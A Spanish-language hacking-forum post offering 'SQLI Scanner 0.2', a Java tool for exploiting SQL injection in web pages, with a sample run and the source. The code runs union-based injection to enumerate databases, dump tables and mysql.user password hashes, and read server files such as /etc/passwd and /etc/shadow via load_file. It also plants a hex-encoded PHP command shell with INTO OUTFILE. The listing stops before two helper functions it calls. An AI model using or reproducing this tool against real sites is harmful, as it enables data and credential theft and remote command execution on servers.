[Java] SQLI Scanner 0.2

[BigBear]

Traduccion completa de este simple programa para scannear paginas vulnerables a SQLI llamado k0bra que habia hecho antiguamente en Perl.

Con las siguientes opciones :

• Comprobar vulnerabilidad
  
• Buscar numero de columnas
  
• Buscar automaticamente el numero para mostrar datos
  
• Mostras tablas
  
• Mostrar columnas
  
• Mostrar bases de datos
  
• Mostrar tablas de otra DB
  
• Mostrar columnas de una tabla de otra DB
  
• Mostrar usuarios de mysql.user
  
• Buscar archivos usando load_file
  
• Mostrar un archivo usando load_file
  
• Mostrar valores
  
• Mostrar informacion sobre la DB
  
• Crear una shell usando outfile
  
• Todo se guarda en logs ordenados
  
  Un ejemplo de uso :
  
  
  Código [Seleccionar] Expandir
  

-- == SQLI Scanner 0.2 == --


[+] Page :
http://localhost/sql.php?id=

[+] Checking ...

[+] Scanning ...

[Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3
[Limit] : The site has 3 columns
[Data] : The number 1 print data

-- == OPTIONS == --

--== information_schema.tables ==--
[1] : Show tables
[2] : Show columns
[3] : Show DBS
[4] : Show tables with other DB
[5] : Show columns with other DB
--== mysql.user ==--
[6] : Show users
--== Others ==--
[7] : Fuzzing files with load_file
[8] : Read a file with load_file
[9] : Dump
[10] : Informacion of the server
[11] : Create a shell with into outfile
[12] : Show Log
[13] : Exit

[Option] :
10

[+] Searching informaion ...

[+] DB Version : 5.5.20-log
[+] DB Name : hackman
[+] Username : root@localhost
[+] information_schema : on
[+] mysqluser : on
[-] load_file : off

[+] Finished



  
  
  El codigo es el siguiente :
  
  
  Código (java) [Seleccionar] Expandir
  
// -- == -- == -- == ---- ==
// SQLI Scanner 0.2       ||
// -- == -- == -- == ---- ==
// (C) Doddy Hackman 2013 ||
// -- == -- == -- == ---- ==

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String target;
        Scanner host = new Scanner(System.in);

        installer();

        System.out.println("\n\n-- == SQLI Scanner 0.2 == --\n\n");
        System.out.println("[+] Page : ");
        target = host.nextLine();
        scan(target);

//schematables("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//schemacolumns("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers");
//getdbs("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//getablesbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman");
//getcolbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman","hackers");
//mysqluser("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//dumper("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers","usuario","password");
//fuzzfiles("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//openfile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","c:/test.txt");
//intofile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","C:/Archivos de programa/EasyPHP-5.3.9/www","/");

    }

    private static void manejo(String urla) throws Exception {

        while (true) {
            System.out.println("\n-- == OPTIONS == --\n");
            System.out.println("--== information_schema.tables ==--");
            System.out.println("[1] : Show tables");
            System.out.println("[2] : Show columns");
            System.out.println("[3] : Show DBS");
            System.out.println("[4] : Show tables with other DB");
            System.out.println("[5] : Show columns with other DB");
            System.out.println("--== mysql.user ==--");
            System.out.println("[6] : Show users");
            System.out.println("--== Others ==--");
            System.out.println("[7] : Fuzzing files with load_file");
            System.out.println("[8] : Read a file with load_file");
            System.out.println("[9] : Dump");
            System.out.println("[10] : Informacion of the server");
            System.out.println("[11] : Create a shell with into outfile");
            System.out.println("[12] : Show Log");
            System.out.println("[13] : Exit");

            int op;
            Scanner host = new Scanner(System.in);
            System.out.println("\n[Option] :");
            op = host.nextInt();

            if (op == 1) {
                schematables(urla);
                continuar();
            } else if (op == 2) {

                String coler;

                Scanner a = new Scanner(System.in);
                System.out.println("\n[+] Table : ");
                coler = a.nextLine();

                schemacolumns(urla, coler);
                continuar();

            } else if (op == 3) {
                getdbs(urla);
                continuar();
            } else if (op == 4) {

                String tabler;

                Scanner a = new Scanner(System.in);
                System.out.println("\n[+] DB : ");
                tabler = a.nextLine();

                getablesbydb(urla, tabler);
                continuar();

            } else if (op == 5) {

                String dber;
                String tablerx;

                Scanner a = new Scanner(System.in);
                System.out.println("\n[+] DB : ");
                dber = a.nextLine();

                Scanner b = new Scanner(System.in);
                System.out.println("\n[+] Table : ");
                tablerx = a.nextLine();

                getcolbydb(urla, dber, tablerx);
                continuar();

            } else if (op == 6) {

                mysqluser(urla);
                continuar();

            } else if (op == 7) {

                fuzzfiles(urla);
                continuar();

            } else if (op == 8) {

                String ar;

                Scanner f = new Scanner(System.in);
                System.out.println("\n[+] File : ");
                ar = f.nextLine();

                openfile(urla, ar);
                continuar();

            } else if (op == 9) {

                String a;
                String b;
                String c;

                Scanner m = new Scanner(System.in);
                System.out.println("\n[+] Table : ");
                a = m.nextLine();

                Scanner n = new Scanner(System.in);
                System.out.println("\n[+] Column 1 : ");
                b = n.nextLine();

                Scanner l = new Scanner(System.in);
                System.out.println("\n[+] Column 2 : ");
                c = l.nextLine();

                dumper(urla, a, b, c);

                continuar();

            } else if (op == 10) {

                details(urla);
                continuar();

            } else if (op == 11) {

                String b;
                String c;

                Scanner m = new Scanner(System.in);
                System.out.println("\n[+] Full Path Discloure : ");
                b = m.nextLine();

                Scanner n = new Scanner(System.in);
                System.out.println("\n[+] Directory to test : ");
                c = n.nextLine();

                intofile(urla, b, c);
                continuar();

            } else if (op == 12) {

                String ruta;

                URL h = new URL(urla);

                ruta = System.getProperty("user.dir") + "/logs/" + h.getHost() + ".txt";

                System.out.println("\n[+] Check logs in : " + ruta);
                continuar();

            } else if (op == 13) {
                System.out.println("\n-- == (C) Doddy Hackman 2013 == --");
                continuar();
                System.exit(1);
            } else {
                System.out.println("\n[-] Bad Option\n");
                continuar();
            }

        }
    }

    private static void continuar() throws Exception {
        System.out.println("\n[+] Finished\n");
        Scanner chau = new Scanner(System.in);
        chau.nextLine();
    }

    private static void installer() throws Exception {

        File crear = new File("logs");

        if (!crear.isDirectory()) {
            crear.mkdirs();
        }

    }

    private static void intofile(String urla, String fpd, String dir) throws Exception {

        String linea;
        String lugar;
        String lugardos;
        String webtest;
        String web1;
        String formandoweb;
        String code;

        linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e";
        lugar = fpd + "/cmd.php";
        lugardos = dir + "/cmd.php";

        URL h = new URL(urla);

        System.out.println("\n[+] Checking ...\n");

        webtest = "http://" + h.getHost() + lugardos;
        Pattern uno = null;
        Matcher dos = null;

        web1 = urla.replace("hackman", linea);
        formandoweb = web1 + "+into+outfile+'" + lugar + "'--";

        code = toma(formandoweb);
        code = toma(webtest);

        uno = Pattern.compile("Mini Shell By Doddy");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[Shell UP] : " + webtest);
            savefile(urla, "\r\n" + "[Shell UP] : " + webtest + "\r\n");
        } else {
            System.out.println("[-] Error");
        }

    }

    private static void openfile(String urla, String file) throws Exception {

        String archivo;
        String web1;
        String code;

        Pattern uno = null;
        Matcher dos = null;

        archivo = encodehex(file);

        web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");

        System.out.println("\n[+] Reading ...\n");

        code = toma(web1);

        uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {

            System.out.println("[+] File Found : " + file);
            System.out.println("\n[Source Start]\n");
            System.out.println(dos.group(1));
            System.out.println("\n[Source End]\n");

            savefile(urla, "\r\n" + "[+] File Found : " + file);
            savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
            savefile(urla, dos.group(1));
            savefile(urla, "\r\n" + "[Source End]" + "\r\n");

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void fuzzfiles(String urla) throws Exception {

        String[] archivos = {"c:/test.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/admin.php", "C:/xampp/htdocs/leer.txt", "../../../boot.ini", "../../../../boot.ini", "../../../../../boot.ini", "../../../../../../boot.ini", "/etc/passwd", "/etc/shadow", "/etc/shadow~", "/etc/hosts", "/etc/motd", "/etc/apache/apache.conf", "/etc/fstab", "/etc/apache2/apache2.conf", "/etc/apache/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache2/httpd.conf", "/etc/apache2/sites-available/default", "/etc/mysql/my.cnf", "/etc/my.cnf", "/etc/sysconfig/network-scripts/ifcfg-eth0", "/etc/redhat-release", "/etc/httpd/conf.d/php.conf", "/etc/pam.d/proftpd", "/etc/phpmyadmin/config.inc.php", "/var/www/config.php", "/etc/httpd/logs/error_log", "/etc/httpd/logs/error.log", "/etc/httpd/logs/access_log", "/etc/httpd/logs/access.log", "/var/log/apache/error_log", "/var/log/apache/error.log", "/var/log/apache/access_log", "/var/log/apache/access.log", "/var/log/apache2/error_log", "/var/log/apache2/error.log", "/var/log/apache2/access_log", "/var/log/apache2/access.log", "/var/www/logs/error_log", "/var/www/logs/error.log", "/var/www/logs/access_log", "/var/www/logs/access.log", "/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log", "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log", "/var/log/error_log", "/var/log/error.log", "/var/log/access_log", "/var/log/access.log", "/etc/group", "/etc/security/group", "/etc/security/passwd", "/etc/security/user", "/etc/security/environ", "/etc/security/limits", "/usr/lib/security/mkuser.default", "/apache/logs/access.log", "/apache/logs/error.log", "/etc/httpd/logs/acces_log", "/etc/httpd/logs/acces.log", "/var/log/httpd/access_log", "/var/log/httpd/error_log", "/apache2/logs/error.log", "/apache2/logs/access.log", "/logs/error.log", "/logs/access.log", "/usr/local/apache2/logs/access_log", "/usr/local/apache2/logs/access.log", "/usr/local/apache2/logs/error_log", "/usr/local/apache2/logs/error.log", "/var/log/httpd/access.log", "/var/log/httpd/error.log", "/opt/lampp/logs/access_log", "/opt/lampp/logs/error_log", "/opt/xampp/logs/access_log", "/opt/xampp/logs/error_log", "/opt/lampp/logs/access.log", "/opt/lampp/logs/error.log", "/opt/xampp/logs/access.log", "/opt/xampp/logs/error.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/access.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/error.log", "/usr/local/apache/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/etc/apache/conf/httpd.conf", "/usr/local/etc/apache/conf/httpd.conf", "/usr/local/apache/httpd.conf", "/usr/local/apache2/httpd.conf", "/usr/local/httpd/conf/httpd.conf", "/usr/local/etc/apache2/conf/httpd.conf", "/usr/local/etc/httpd/conf/httpd.conf", "/usr/apache2/conf/httpd.conf", "/usr/apache/conf/httpd.conf", "/usr/local/apps/apache2/conf/httpd.conf", "/usr/local/apps/apache/conf/httpd.conf", "/etc/apache2/conf/httpd.conf", "/etc/http/conf/httpd.conf", "/etc/httpd/httpd.conf", "/etc/http/httpd.conf", "/etc/httpd.conf", "/opt/apache/conf/httpd.conf", "/opt/apache2/conf/httpd.conf", "/var/www/conf/httpd.conf", "/private/etc/httpd/httpd.conf", "/private/etc/httpd/httpd.conf.default", "/Volumes/webBackup/opt/apache2/conf/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", "C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf", "C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf", "C:/ProgramFiles/xampp/apache/conf/httpd.conf", "/usr/local/php/httpd.conf.php", "/usr/local/php4/httpd.conf.php", "/usr/local/php5/httpd.conf.php", "/usr/local/php/httpd.conf", "/usr/local/php4/httpd.conf", "/usr/local/php5/httpd.conf", "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", "/usr/local/etc/apache/vhosts.conf", "/etc/php.ini", "/bin/php.ini", "/etc/httpd/php.ini", "/usr/lib/php.ini", "/usr/lib/php/php.ini", "/usr/local/etc/php.ini", "/usr/local/lib/php.ini", "/usr/local/php/lib/php.ini", "/usr/local/php4/lib/php.ini", "/usr/local/php5/lib/php.ini", "/usr/local/apache/conf/php.ini", "/etc/php4.4/fcgi/php.ini", "/etc/php4/apache/php.ini", "/etc/php4/apache2/php.ini", "/etc/php5/apache/php.ini", "/etc/php5/apache2/php.ini", "/etc/php/php.ini", "/etc/php/php4/php.ini", "/etc/php/apache/php.ini", "/etc/php/apache2/php.ini", "/web/conf/php.ini", "/usr/local/Zend/etc/php.ini", "/opt/xampp/etc/php.ini", "/var/local/www/conf/php.ini", "/etc/php/cgi/php.ini", "/etc/php4/cgi/php.ini", "/etc/php5/cgi/php.ini", "c:/php5/php.ini", "c:/php4/php.ini", "c:/php/php.ini", "c:/PHP/php.ini", "c:/WINDOWS/php.ini", "c:/WINNT/php.ini", "c:/apache/php/php.ini", "c:/xampp/apache/bin/php.ini", "c:/NetServer/bin/stable/apache/php.ini", "c:/home2/bin/stable/apache/php.ini", "c:/home/bin/stable/apache/php.ini", "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", "/usr/local/cpanel/logs", "/usr/local/cpanel/logs/stats_log", "/usr/local/cpanel/logs/access_log", "/usr/local/cpanel/logs/error_log", "/usr/local/cpanel/logs/license_log", "/usr/local/cpanel/logs/login_log", "/var/cpanel/cpanel.config", "/var/log/mysql/mysql-bin.log", "/var/log/mysql.log", "/var/log/mysqlderror.log", "/var/log/mysql/mysql.log", "/var/log/mysql/mysql-slow.log", "/var/mysql.log", "/var/lib/mysql/my.cnf", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log", "C:/ProgramFiles/MySQL/data/hostname.err", "C:/ProgramFiles/MySQL/data/mysql.log", "C:/ProgramFiles/MySQL/data/mysql.err", "C:/ProgramFiles/MySQL/data/mysql-bin.log", "C:/MySQL/data/hostname.err", "C:/MySQL/data/mysql.log", "C:/MySQL/data/mysql.err", "C:/MySQL/data/mysql-bin.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf", "C:/ProgramFiles/MySQL/my.ini", "C:/ProgramFiles/MySQL/my.cnf", "C:/MySQL/my.ini", "C:/MySQL/my.cnf", "/etc/logrotate.d/proftpd", "/www/logs/proftpd.system.log", "/var/log/proftpd", "/etc/proftp.conf", "/etc/protpd/proftpd.conf", "/etc/vhcs2/proftpd/proftpd.conf", "/etc/proftpd/modules.conf", "/var/log/vsftpd.log", "/etc/vsftpd.chroot_list", "/etc/logrotate.d/vsftpd.log", "/etc/vsftpd/vsftpd.conf", "/etc/vsftpd.conf", "/etc/chrootUsers", "/var/log/xferlog", "/var/adm/log/xferlog", "/etc/wu-ftpd/ftpaccess", "/etc/wu-ftpd/ftphosts", "/etc/wu-ftpd/ftpusers", "/usr/sbin/pure-config.pl", "/usr/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.conf", "/usr/local/etc/pure-ftpd.conf", "/usr/local/etc/pureftpd.pdb", "/usr/local/pureftpd/etc/pureftpd.pdb", "/usr/local/pureftpd/sbin/pure-config.pl", "/usr/local/pureftpd/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.pdb", "/etc/pureftpd.pdb", "/etc/pureftpd.passwd", "/etc/pure-ftpd/pureftpd.pdb", "/var/log/pure-ftpd/pure-ftpd.log", "/logs/pure-ftpd.log", "/var/log/pureftpd.log", "/var/log/ftp-proxy/ftp-proxy.log", "/var/log/ftp-proxy", "/var/log/ftplog", "/etc/logrotate.d/ftp", "/etc/ftpchroot", "/etc/ftphosts", "/var/log/exim_mainlog", "/var/log/exim/mainlog", "/var/log/maillog", "/var/log/exim_paniclog", "/var/log/exim/paniclog", "/var/log/exim/rejectlog", "/var/log/exim_rejectlog"};
        String archivo;
        String web1;
        String code;

        Pattern uno = null;
        Matcher dos = null;

        System.out.println("\n[+] Searching files with load_file() ....\n");

        for (int count = 0; count < archivos.length; count++) {

            archivo = encodehex(archivos[count]);

            web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");

            code = toma(web1);

            uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {

                System.out.println("[+] File Found : " + archivos[count]);
                System.out.println("\n[Source Start]\n");
                System.out.println(dos.group(1));
                System.out.println("\n[Source End]\n");

                savefile(urla, "\r\n" + "[+] File Found : " + archivos[count]);
                savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
                savefile(urla, dos.group(1));
                savefile(urla, "\r\n" + "[Source End]" + "\r\n");

            }

        }

    }

    private static void dumper(String urla, String tabla, String col1, String col2) throws Exception {

        String web1;
        String web2;
        String code;
        int x;

        Pattern uno = null;
        Matcher dos = null;

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))");

        code = toma(web1 + "+from+" + tabla + "--");

        System.out.println("\n[+] Getting Values ...");

        uno = Pattern.compile("K0BRA(.*?)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] Values Founds : " + dos.group(1));
            savefile(urla, "\r\n" + "[+] Table to dump : " + tabla + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+" + tabla + "+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("\n[+] " + col1 + " : " + dos.group(1));
                    System.out.println("[+] " + col2 + " : " + dos.group(2));

                    savefile(urla, "\r\n" + "[+] " + col1 + " : " + dos.group(1));
                    savefile(urla, "[+] " + col2 + " : " + dos.group(2));

                }

            }

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void mysqluser(String urla) throws Exception {

        String web1;
        String web2;
        String code;
        int x;

        Pattern uno = null;
        Matcher dos = null;

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))");

        System.out.println("\n[+] Searching mysql.user ....");

        code = toma(web1 + "+from+mysql.user--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] Users Found : " + dos.group(1));

            savefile(urla, "\r\n" + "[+] Users Found : " + dos.group(1) + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+mysql.user+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("\n[+] Host : " + dos.group(1));
                    System.out.println("[+] Username : " + dos.group(2));
                    System.out.println("[+] Password : " + dos.group(3));

                    savefile(urla, "\r\n" + "[+] Host : " + dos.group(1));
                    savefile(urla, "[+] Username : " + dos.group(2));
                    savefile(urla, "[+] Password : " + dos.group(3));

                }

            }

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void getcolbydb(String urla, String db, String tab) throws Exception {

        String web1;
        String web2;
        String code;

        String dbf;
        String table;

        int x;

        Pattern uno = null;
        Matcher dos = null;

        dbf = encodehex(db);
        table = encodehex(tab);

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");

        System.out.println("\n[+] Getting Columns ....");

        code = toma(web1 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");

            savefile(urla, "\r\n" + "[+] Columns Found in the Table [" + tab + "." + db + "] : " + dos.group(1) + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("[+] Column Found : " + dos.group(1));
                    savefile(urla, "[+] Column Found : " + dos.group(1));
                }

            }

        } else {
            System.out.println("[-] Not Found");
        }


    }

    private static void getablesbydb(String urla, String db) throws Exception {

        String web1;
        String web2;
        String code;
        String data;
        int x;
        Pattern uno = null;
        Matcher dos = null;

        data = encodehex(db);

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");

        System.out.println("\n[+] Getting Tables ....");

        code = toma(web1 + "+from+information_schema.tables+where+table_schema=" + data + "--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] Tables Found : " + dos.group(1) + "\n");
            savefile(urla, "\r\n" + "[DB] : " + db + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+information_schema.tables+where+table_schema=" + data + "+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("[+] Table Found : " + dos.group(1));
                    savefile(urla, "[+] Table Found : " + dos.group(1));
                }

            }

        } else {
            System.out.println("[-] Not Found");
        }


    }

    private static void getdbs(String urla) throws Exception {

        String web1;
        String web2;
        String code;
        int x;
        Pattern uno = null;
        Matcher dos = null;

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))");

        System.out.println("\n[+] Getting DBS ....");

        code = toma(web1 + "+from+information_schema.schemata--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] DBS Found : " + dos.group(1) + "\n");

            savefile(urla, "\r\n" + "[+] DBS Found : " + dos.group(1) + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+information_schema.schemata+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("[+] DB Found : " + dos.group(1));
                    savefile(urla, "[+] DB Found : " + dos.group(1));
                }

            }

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void schemacolumns(String urla, String nombre) throws Exception {

        String web1;
        String web2;
        String code;
        String tablexa;
        int x;
        Pattern uno = null;
        Matcher dos = null;

        tablexa = encodehex(nombre);

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");

        System.out.println("\n[+] Getting columns ....");

        code = toma(web1 + "+from+information_schema.columns+where+table_name=" + tablexa + "--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");

            savefile(urla, "\r\n" + "[Table] : " + nombre + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+information_schema.columns+where+table_name=" + tablexa + "+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("[+] Column Found : " + dos.group(1));
                    savefile(urla, "[+] Column Found : " + dos.group(1));
                }

            }

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void schematables(String urla) throws Exception {

        String web1;
        String web2;
        String code;
        int x;
        Pattern uno = null;
        Matcher dos = null;

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");

        System.out.println("\n[+] Getting tables ....\n");

        code = toma(web1 + "+from+information_schema.tables--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] Tables Found : " + dos.group(1) + "\n");

            savefile(urla, "");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+information_schema.tables+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("[+] Table Found : " + dos.group(1));
                    savefile(urla, "[+] Table Found : " + dos.group(1));
                }

            }

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void scan(String urla) throws Exception {

        String codex;
        String target;

        Pattern uno = null;
        Matcher dos = null;

        target = urla;

        System.out.println("\n[+] Checking ...\n");

        codex = toma(target + "-1+union+select+666--");

        uno = Pattern.compile("The used SELECT statements have a different number of columns");
        dos = uno.matcher(codex);

        if (dos.find()) {
            System.out.println("[+] Scanning ...\n");

            int x;
            String urlfinal;
            String otrofinal;
            String code;
            String formariny;
            String otroformar;
            String link;

            urlfinal = "";
            formariny = "";

            for (x = 1; x <= 5; x = x + 1) {

//urlfinal = urlfinal+x+",";
                urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
                formariny = formariny + x + ",";

                otrofinal = urlfinal;
                otroformar = formariny;

                otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
                otroformar = otroformar.substring(0, otroformar.length() - 1);

                code = toma(target + "-1+union+select+" + otrofinal);

                uno = Pattern.compile("RATSXPDOWN(\\d+)");
                dos = uno.matcher(code);

                if (dos.find()) {

                    otroformar = otroformar.replace(dos.group(1), "hackman");

                    link = target + "-1+union+select+" + otroformar;

                    System.out.println("[Target] : " + link);
                    System.out.println("[Limit] : The site has " + x + " columns");
                    System.out.println("[Data] : The number " + dos.group(1) + " print data");

                    savefile(link, "\r\n" + "[Target] : " + link);
                    savefile(link, "[Limit] : The site has " + x + " columns");
                    savefile(link, "[Data] : The number " + dos.group(1) + " print data");

                    manejo(link);

                    System.exit(1);

                }

            }
            System.out.println("[-] Error");
        } else {
            System.out.println("[-] Not vulnerable");
        }

    }

    private static void details(String urla) throws Exception {

        String concat;
        String code;

        Pattern uno = null;
        Matcher dos = null;

        concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";

        urla = urla.replace("hackman", concat);

        System.out.println("\n[+] Searching informaion ...\n");

        code = toma(urla);

        uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] DB Version : " + dos.group(1));
            System.out.println("[+] DB Name : " + dos.group(2));
            System.out.println("[+] Username : " + dos.group(3));

            savefile(urla, "\r\n" + "[+] DB Version : " + dos.group(1));
            savefile(urla, "[+] DB Name : " + dos.group(2));
            savefile(urla, "[+] Username : " + dos.group(3));

        } else {
            System.out.println("[-] Not found any data");
        }

        urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");

        code = toma(urla + "+from+information_schema.tables--");
        uno = Pattern.compile("ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] information_schema : on");
            savefile(urla, "[+] information_schema : on");
        } else {
            System.out.println("[-] information_schema : off");
        }

        code = toma(urla + "+from+mysql.user--");
        uno = Pattern.compile("ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] mysqluser : on");
            savefile(urla, "[+] mysqluser : on");
        } else {
            System.out.println("[-] mysquser : off");
        }

        urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");

        code = toma(urla);
        uno = Pattern.compile("ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[-] load_file : on");
            savefile(urla, "[-] load_file : on");
        } else {
            System.out.println("[-] load_file : off");
        }

    }

    private static void savefile(String nombre, String texto) throws Exception {

        String formar;

        URL h = new URL(nombre);

        formar = "logs/" + h.getHost() + ".txt";

        FileWriter writer = new FileWriter(formar, true);
        writer.write(texto + "\r\n");
        writer.close();

    }

